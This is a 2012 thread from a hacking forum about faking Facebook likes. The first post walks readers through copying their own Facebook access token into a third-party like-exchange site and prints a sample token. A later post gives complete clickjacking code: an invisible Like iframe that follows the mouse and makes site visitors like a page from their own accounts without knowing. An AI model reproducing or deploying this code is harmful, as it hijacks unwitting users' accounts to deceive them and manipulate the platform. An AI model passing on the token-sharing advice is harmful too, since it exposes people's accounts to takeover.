![]() |
|
Facebook likes hack - Printable Version +- Sinisterly (https://sinister.ly) +-- Forum: Hacking (https://sinister.ly/Forum-Hacking) +--- Forum: Tutorials (https://sinister.ly/Forum-Tutorials) +--- Thread: Facebook likes hack (/Thread-Facebook-likes-hack) |
Facebook likes hack - krislovesholly - 11-21-2012 How To Hack Facebook Likes 1.Go to privacy settings on Facebook 2.Set all to public and all the other settings below to everyone (important) For example timeline and how you connect make sure its all set to everyone. 3.Now go to account settings you will see Subscribers on the left hand side click that.. 4.edit all these options and also make sure they are set to everyone and public. 5.Now make a status the one you want likes on or if you want it on a previous one then it dont mater .6.Now go to http://likelo.com/ and were it says Click Here click there and it will take you to another page click allow and allow all till it takes you to the final page the facebook page. 7.when your at the facebook page you need to focus on the address bar i will provide a picture below what you want is your access token.... This is a example of your access token highlighted in yellow and also there will be a pic to show u the highlighted access token you will need this for the next step the access token is in the search bar between = and &expires access token link below u will see this in the address bar http://www-.facebook..com/connect/login_success.html#access_token=AAABempp6Ls0BALZCts7v95z5v9NGAgrQu7QMPObrjjQAqqZCZBD0h4RZBpYM5SW71cKtQhP8VKHDuWZB2y0qJEiA88Dy3bxYdS5gB3OBeKwZDZD&expires_in=0 ![]() 8.Now what u need to do you need to copy your access token because you are going to be pasting this token soon. 9.Now go back to the LikeLo page and paste your access token into the box on left of submit then you need to click submit example below. ![]() 10.Now you will get to the next page this is the last step the status you see on the pages click submit on the status you want over 50-350 likes... ![]() 11.Go back to your status now u will see a silly ammount of likes should have over 50 bout time you get back to your status you should have quite a few already ...thanx for reading enjoy.... This Tut by krislovesholly aka TheArmyKid RE: Facebook likes hack - Mediocrity_mybb_import6293 - 11-22-2012 seen this thread in less detail on hc before nice share one thing the access token is different for each person ? you have to click the 'click here' button on the url likelo.com and then it takes you to a blank website which gives the success displayed on the screen you copy the url and paste it into the likelo.com so this quoted only works for you Quote: http://www-.facebook..com/connect/login_success.html#access_token=AAABempp6Ls0BALZCts7v95z5v9NGAgrQu7QMPObrjjQAqqZCZBD0h4RZBpYM5SW71cKtQhP8VKHDuWZB2y0qJEiA88Dy3bxYdS5gB3OBeKwZDZD&expires_in=0 RE: Facebook likes hack - krislovesholly - 11-22-2012 Yeah different access token for each person known this for a couple of years the like hack i used to have my own site like this but cant afford paid hosting if you have a site like this on free hosting it goes down all time with ip connection limit exceeded got the script for it but its pointless unless you got some paid hosting im trying to make a script what does this but autocomments instead i know its possible but people dont share there auto comments i hate people who dont share lol i share everything
RE: Facebook likes hack - LightX - 11-22-2012 I have seen this one before too. This one is way better though
RE: Facebook likes hack - krislovesholly - 11-22-2012 (11-22-2012, 12:47 AM)LightX Wrote: I have seen this one before too. This one is way better though thankyou i always try to find the best ways and explain the easiest way possible ive got a website to with loads of tutorials i have wrote on it so alot of times i just copy and paste my own method there methods wrote by me so why not heh lol
RE: Facebook likes hack - LightX - 11-22-2012 Haha thats cool!! ![]() -LightX RE: Facebook likes hack - Mediocrity_mybb_import6293 - 11-22-2012 (11-22-2012, 12:46 AM)krislovesholly Wrote: Yeah different access token for each person known this for a couple of years the like hack i used to have my own site like this but cant afford paid hosting if you have a site like this on free hosting it goes down all time with ip connection limit exceeded got the script for it but its pointless unless you got some paid hosting im trying to make a script what does this but autocomments instead i know its possible but people dont share there auto comments i hate people who dont share lol i share everything do you still have the script ? RE: Facebook likes hack - LightX - 11-22-2012 :o $5HC more!!! I want! :p what does it do? RE: Facebook likes hack - Mediocrity_mybb_import6293 - 11-22-2012 (11-22-2012, 01:29 AM)LightX Wrote: :o $5HC more!!! I want! :p what does it do? Sent RE: Facebook likes hack - krislovesholly - 11-22-2012 I've seen a LOT of people trying to sell a script to auto like external pages. It's not worth it. This little script will auto like any external page it's loaded on if the user clicks anywhere on the site. It works. It's free. It can be altered to auto click on page_load too, your choice. First download "jquery-1.4.2.min.js" the version IS important. http://code.jquery.com/jquery-1.4.2.min.js or copy the code in notepad and save as utf8 and save as .js so its javascript Place this in your header section, right below <title></title> <script src="jquery-1.4.2.min.js" type="text/javascript"></script> <script type="text/javascript"> var interval; $(function() { interval=setInterval("updateActiveElement();", 50); }); function updateActiveElement() { if ( $(document.activeElement).attr('id')=="fbframe" ) { clearInterval(interval); iflag=1; } } </script> Insert this into your footer section right before </body></html> Make sure to change this code to reflect YOUR site url. Look for thehackerzcrib.3owl.com/ and replace with YOURS. <div style="overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="icontainer"> <!--facebook like frame code goes here--> <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fthehackerzcrib.3owl.com/%2F&layout=standard&show_faces=false&width=450&action=like&font=tahoma&colorscheme=light&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="fbframe" name="fbframe"></iframe> <!--end facebook like frame code--> </div> <script> var iflag = 0; var icontainer = document.getElementById('icontainer'); var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body //create reference to common "body" across doctypes function mouseFollower(e){ /* DO NOT EDIT THIS */ if (window.event) { // for IE icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px'; icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px'; } else { icontainer.style.top = (e.pageY-5)+'px'; icontainer.style.left = (e.pageX-5)+'px'; } } document.onmousemove = function(e) { if (iflag == 0) {mouseFollower(e);} } </script> And that's it. Anytime someone views your site and clicks somewhere (we all click, we just don't realize it) you'll get a FB Like on THEIR account. heres the script script is further down the page
|